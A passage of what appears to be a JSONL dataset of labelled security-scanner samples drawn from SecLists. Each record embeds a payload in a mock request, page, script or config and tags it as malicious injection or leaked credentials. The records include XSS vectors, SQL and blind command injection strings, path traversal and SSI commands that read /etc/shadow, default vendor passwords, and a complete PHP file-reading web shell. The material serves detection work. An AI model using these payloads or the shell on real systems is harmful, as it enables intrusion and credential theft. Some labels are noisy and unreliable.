"%0A%20str%3D%24%28echo%20NWELWC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20", "injection_type": "cmd"}}]} {"id": "seclists_02223", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf a)|/usr/bin/id", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "a)|/usr/bin/id", "injection_type": "cmd"}}]} {"id": "seclists_02224", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><ul draggable=\"true\" ondragend=\"alert(1)\">test</ul></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<ul draggable=\"true\" ondragend=\"alert(1)\">test</ul>", "injection_type": "XSS"}}]} {"id": "seclists_02225", "source": "seclists", "source_license": "MIT", "text": "filename==", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "=", "injection_type": "cmd"}}]} {"id": "seclists_02226", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">IMG Lowsrc</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "IMG Lowsrc", "injection_type": "XSS"}}]} {"id": "seclists_02227", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=exec sp HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "exec sp", "injection_type": "SQL"}}]} {"id": "seclists_02228", "source": "seclists", "source_license": "MIT", "text": "username=) or ('a'='a&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ") or ('a'='a", "injection_type": "SQL"}}]} {"id": "seclists_02229", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><iframe onkeyup=\"alert(1)\" contenteditable>test</iframe></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<iframe onkeyup=\"alert(1)\" contenteditable>test</iframe>", "injection_type": "XSS"}}]} {"id": "seclists_02230", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=rita\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "rita"}}]} {"id": "seclists_02231", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><style>:target {color: red;}</style><footer id=x style=\"transition:color 10s\" ontransitioncancel=alert(1)></footer></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {color: red;}</style><footer id=x style=\"transition:color 10s\" ontransitioncancel=alert(1)></footer>", "injection_type": "XSS"}}]} {"id": "seclists_02232", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%0A%20str%3D%24%28echo%20HFODHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23", "injection_type": "cmd"}}]} {"id": "seclists_02233", "source": "seclists", "source_license": "MIT", "text": "password: Adobe,author,author,https://docs.adobe.com/docs/v5_2/html-resources/cq5_guide_power_user/ch07s02.html#sect_default_users_and_groups\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Adobe,author,author,https://docs.adobe.com/docs/v5_2/html-resources/cq5_guide_power_user/ch07s02.html#sect_default_users_and_groups"}}]} {"id": "seclists_02234", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'hi or a=a';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "hi or a=a", "injection_type": "SQL"}}]} {"id": "seclists_02235", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: <body onload=;a2={y:eval};a1={x:a2.y('al'+'ert')};;;;;;;;;_=a1.x;_(1);;;;\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <body onload=;a2={y:eval};a1={x:a2.y('al'+'ert')};;;;;;;;;_=a1.x;_(1);;;;", "injection_type": "XSS"}}]} {"id": "seclists_02236", "source": "seclists", "source_license": "MIT", "text": "filename=;echo%20PSMUSP$((33%2B35))$(echo%20PSMUSP)PSMUSP'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";echo%20PSMUSP$((33%2B35))$(echo%20PSMUSP)PSMUSP'", "injection_type": "cmd"}}]} {"id": "seclists_02237", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=morales\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "morales"}}]} {"id": "seclists_02238", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<x onmouseout=alert(1)>hover this! HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x onmouseout=alert(1)>hover this!", "injection_type": "XSS"}}]} {"id": "seclists_02239", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=' or '1'='1'-- HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or '1'='1'--", "injection_type": "cmd"}}]} {"id": "seclists_02240", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><col id=x tabindex=1 onbeforedeactivate=alert(1)></col><input autofocus></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<col id=x tabindex=1 onbeforedeactivate=alert(1)></col><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_02241", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Name: Spaces/Meta Chars\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Spaces/Meta Chars", "injection_type": "XSS"}}]} {"id": "seclists_02242", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit String: <LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\"></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">", "injection_type": "XSS"}}]} {"id": "seclists_02243", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: )print(`echo%20IFOQRT;echo%20$((35%2B23));echo%20IFOQRT;echo%20IFOQRT`)%3B//IFOQRT", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ")print(`echo%20IFOQRT;echo%20$((35%2B23));echo%20IFOQRT;echo%20IFOQRT`)%3B//IFOQRT", "injection_type": "cmd"}}]} {"id": "seclists_02244", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %26echo%20VLCTNG$((82%2B89))$(echo%20VLCTNG)VLCTNG|", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26echo%20VLCTNG$((82%2B89))$(echo%20VLCTNG)VLCTNG|", "injection_type": "cmd"}}]} {"id": "seclists_02245", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:AWARD,<BLANK>,award_?,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "AWARD,<BLANK>,award_?,"}}]} {"id": "seclists_02246", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=&#x0003c; HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#x0003c;", "injection_type": "cmd"}}]} {"id": "seclists_02247", "source": "seclists", "source_license": "MIT", "text": "filename=%22%3Becho%20BQSCFC$((0%2B98))$(echo%20BQSCFC)BQSCFC//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%3Becho%20BQSCFC$((0%2B98))$(echo%20BQSCFC)BQSCFC//", "injection_type": "cmd"}}]} {"id": "seclists_02248", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=polo\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "polo"}}]} {"id": "seclists_02249", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:aol123@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "aol123"}}]} {"id": "seclists_02250", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:flyfish@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "flyfish"}}]} {"id": "seclists_02251", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><del id=x tabindex=1 onbeforedeactivate=alert(1)></del><input autofocus></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<del id=x tabindex=1 onbeforedeactivate=alert(1)></del><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_02252", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Name: Unicode encoded script tags</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Unicode encoded script tags", "injection_type": "XSS"}}]} {"id": "seclists_02253", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = as", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "as", "injection_type": "SQL"}}]} {"id": "seclists_02254", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Author Name: thespanner.co.uk</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: thespanner.co.uk", "injection_type": "XSS"}}]} {"id": "seclists_02255", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><blink id=x tabindex=1 onfocus=alert(1)></blink></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<blink id=x tabindex=1 onfocus=alert(1)></blink>", "injection_type": "XSS"}}]} {"id": "seclists_02256", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Data General,operator,operator,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Data General,operator,operator,"}}]} {"id": "seclists_02257", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %3B%20str%3D%24%28echo%20HDIXTH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20HDIXTH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22", "injection_type": "cmd"}}]} {"id": "seclists_02258", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = and 1=( if((load_file(char(110,46,101,120,11 ...", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "and 1=( if((load_file(char(110,46,101,120,11 ...", "injection_type": "SQL"}}]} {"id": "seclists_02259", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit String: <OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>", "injection_type": "XSS"}}]} {"id": "seclists_02260", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"server_port\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"server_port\" -->", "injection_type": "SSI"}}]} {"id": "seclists_02261", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><legend oncut=\"alert(1)\" contenteditable>test</legend></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<legend oncut=\"alert(1)\" contenteditable>test</legend>", "injection_type": "XSS"}}]} {"id": "seclists_02262", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: @*", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "@*", "injection_type": "cmd"}}]} {"id": "seclists_02263", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<image src=validimage.png onloadstart=alert(1)>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<image src=validimage.png onloadstart=alert(1)>", "injection_type": "XSS"}}]} {"id": "seclists_02264", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=STYLE w/Comment HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "STYLE w/Comment", "injection_type": "XSS"}}]} {"id": "seclists_02265", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Name: Obfuscated body onload vector</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Obfuscated body onload vector", "injection_type": "XSS"}}]} {"id": "seclists_02266", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:TOTOLINK,onlime_r,12345,https://pierrekim.github.io/advisories/2015-totolink-0x03.txt", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "TOTOLINK,onlime_r,12345,https://pierrekim.github.io/advisories/2015-totolink-0x03.txt"}}]} {"id": "seclists_02267", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Author Name: ha.ckers.org\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_02268", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Name: Remote Stylesheet 1 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Remote Stylesheet 1", "injection_type": "XSS"}}]} {"id": "seclists_02269", "source": "seclists", "source_license": "MIT", "text": "filename=%7C%7Cecho$IFSCBQMAD$((2%2B96))$(echo$IFSCBQMAD)CBQMAD%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%7Cecho$IFSCBQMAD$((2%2B96))$(echo$IFSCBQMAD)CBQMAD%22", "injection_type": "cmd"}}]} {"id": "seclists_02270", "source": "seclists", "source_license": "MIT", "text": "filename=/../../../../../../../../../../etc/shadow", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/../../../../../../../../../../etc/shadow", "injection_type": "cmd"}}]} {"id": "seclists_02271", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf &lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;", "injection_type": "cmd"}}]} {"id": "seclists_02272", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Obfuscated image tag using dec entities</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Obfuscated image tag using dec entities", "injection_type": "XSS"}}]} {"id": "seclists_02273", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: |%20echo%20USBVMG$((4%2B90))$(echo%20USBVMG)USBVMG", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|%20echo%20USBVMG$((4%2B90))$(echo%20USBVMG)USBVMG", "injection_type": "cmd"}}]} {"id": "seclists_02274", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=ZEOS,<BLANK>,zeosx,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "ZEOS,<BLANK>,zeosx,"}}]} {"id": "seclists_02275", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf a;/usr/bin/id", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "a;/usr/bin/id", "injection_type": "cmd"}}]} {"id": "seclists_02276", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<x </onxxx=1\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x </onxxx=1", "injection_type": "XSS"}}]} {"id": "seclists_02277", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=UNIX,administrator,administrator,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "UNIX,administrator,administrator,"}}]} {"id": "seclists_02278", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:instinct@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "instinct"}}]} {"id": "seclists_02279", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><a onmouseenter=\"alert(1)\">test</a></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<a onmouseenter=\"alert(1)\">test</a>", "injection_type": "XSS"}}]} {"id": "seclists_02280", "source": "seclists", "source_license": "MIT", "text": "password: Lantronics,<BLANK>,system,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Lantronics,<BLANK>,system,"}}]} {"id": "seclists_02281", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><param onbeforepaste=\"alert(1)\" contenteditable>test</param></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<param onbeforepaste=\"alert(1)\" contenteditable>test</param>", "injection_type": "XSS"}}]} {"id": "seclists_02282", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<acronym id=x tabindex=1 onactivate=alert(1)></acronym> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<acronym id=x tabindex=1 onactivate=alert(1)></acronym>", "injection_type": "XSS"}}]} {"id": "seclists_02283", "source": "seclists", "source_license": "MIT", "text": "<?\n//\n// PHP_KIT\n//\n// list.php = Directory & File Listing\n//\n// by: The Dark Raver\n// modified: 21/01/2004\n//\n?>\n\n<?\n\nif($_GET['file']) {\n\t$fichero=$_GET['file']; \n\t} else {\n\t$fichero=\"/\";\n\t} \n\nif($handle = @opendir($fichero)) {\n while($filename = readdir($handle)) {\n echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filename . \"</a><br>\";\n }\n closedir($handle);\n } else {\n echo \"FILE: \" . $fichero . \"<br><hr><pre>\";\n $fp = fopen($fichero, \"r\");\n $buffer = fread($fp, filesize($fichero));\n echo $buffer;\n fclose($fp);\n }\n\n?>", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "list.php"}}]} {"id": "seclists_02284", "source": "seclists", "source_license": "MIT", "text": "filename=x' or 1=1 or 'x'='y", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "x' or 1=1 or 'x'='y", "injection_type": "cmd"}}]} {"id": "seclists_02285", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Tags: general, evil tags</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags", "injection_type": "XSS"}}]} {"id": "seclists_02286", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<frame onbeforecut=\"alert(1)\" contenteditable>test</frame>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<frame onbeforecut=\"alert(1)\" contenteditable>test</frame>", "injection_type": "XSS"}}]} {"id": "seclists_02287", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<img oncopy=\"alert(1)\" contenteditable>test</img>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<img oncopy=\"alert(1)\" contenteditable>test</img>", "injection_type": "XSS"}}]} {"id": "seclists_02288", "source": "seclists", "source_license": "MIT", "text": "filename=%3B%20str%3D%24%28echo%20OTXVUR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20OTXVUR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//", "injection_type": "cmd"}}]} {"id": "seclists_02289", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit String: <A HREF=\"http://www.google.com./\">XSS</A></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <A HREF=\"http://www.google.com./\">XSS</A>", "injection_type": "XSS"}}]} {"id": "seclists_02290", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: <youremail>%0aBcc:<youremail>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<youremail>%0aBcc:<youremail>", "injection_type": "cmd"}}]} {"id": "seclists_02291", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf <xss><script>alert('XSS')</script></vulnerable>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<xss><script>alert('XSS')</script></vulnerable>", "injection_type": "cmd"}}]} {"id": "seclists_02292", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:cardiff@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "cardiff"}}]} {"id": "seclists_02293", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%22%7C%7Cecho$IFSXHMLVN$((71%2B63))$(echo$IFSXHMLVN)XHMLVN%22 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%7C%7Cecho$IFSXHMLVN$((71%2B63))$(echo$IFSXHMLVN)XHMLVN%22", "injection_type": "cmd"}}]} {"id": "seclists_02294", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=IBM,SAVSYS,<BLANK>,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "IBM,SAVSYS,<BLANK>,"}}]} {"id": "seclists_02295", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'delete';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "delete", "injection_type": "SQL"}}]} {"id": "seclists_02296", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Tags: general, evil tags, style injection, internet explorer</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, style injection, internet explorer", "injection_type": "XSS"}}]} {"id": "seclists_02297", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=ddddd1\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "ddddd1"}}]} {"id": "seclists_02298", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:SAP,SAP*,7061992,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "SAP,SAP*,7061992,"}}]} {"id": "seclists_02299", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<li draggable=\"true\" ondragend=\"alert(1)\">test</li> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<li draggable=\"true\" ondragend=\"alert(1)\">test</li>", "injection_type": "XSS"}}]} {"id": "seclists_02300", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %20x", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%20x", "injection_type": "cmd"}}]} {"id": "seclists_02301", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><content id=x tabindex=1 onactivate=alert(1)></content></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<content id=x tabindex=1 onactivate=alert(1)></content>", "injection_type": "XSS"}}]} {"id": "seclists_02302", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=truncate HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "truncate", "injection_type": "SQL"}}]} {"id": "seclists_02303", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><dialog onmousedown=\"alert(1)\">test</dialog></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<dialog onmousedown=\"alert(1)\">test</dialog>", "injection_type": "XSS"}}]} {"id": "seclists_02304", "source": "seclists", "source_license": "MIT", "text": "filename=&#060", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#060", "injection_type": "cmd"}}]} {"id": "seclists_02305", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id='-' HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'-'", "injection_type": "SQL"}}]} {"id": "seclists_02306", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=;id| HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";id|", "injection_type": "cmd"}}]} {"id": "seclists_02307", "source": "seclists", "source_license": "MIT", "text": "# 